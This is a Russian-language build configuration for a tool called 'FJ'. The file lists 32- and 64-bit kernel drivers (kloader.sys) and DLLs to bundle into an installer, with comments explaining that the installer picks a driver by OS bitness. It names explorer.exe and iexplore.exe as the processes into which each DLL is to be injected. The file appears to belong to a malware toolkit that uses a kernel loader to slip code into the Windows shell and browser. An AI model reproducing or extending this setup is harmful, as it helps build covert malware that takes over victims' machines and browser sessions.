; Конфигурационный файл для утилиты FJ
; Описывает драйвера и библиотеки, которые необходимо прикрепить к инсталлеру
; При запуске инсталлер определяет разрядность ОС и устанавливает соответствующий драйвер

; Исходный файл инсталлера (может быть как EXE, так и DLL)
SOURCE: ..\Release\setupdll.dll

; Файл, в который будет записан результат 
OUT: Release\setupdll.dll

; Драйвер для 32х-битной ОС
DRV: ..\KLoader\Release\i386\kloader.sys

; DLL для 32х-битного драйвера
DLL: dll.dll
; Список процессов куда инжектить DLL
explorer.exe
iexplore.exe

; Драйвер для 64х-битной ОС
DRV: ..\kloader\release\amd64\kloader.sys

; 64х-битный драйвер содержит две DLL для разных архитектур
; 64х-битная DLL 
DLL: demo64.dll
; Список процессов куда инжектить 64х-битную DLL
explorer.exe
iexplore.exe

; 32х-битная DLL
DLL: dll.dll
; Список процессов куда инжектить 32х битную DLL
explorer.exe
iexplore.exe
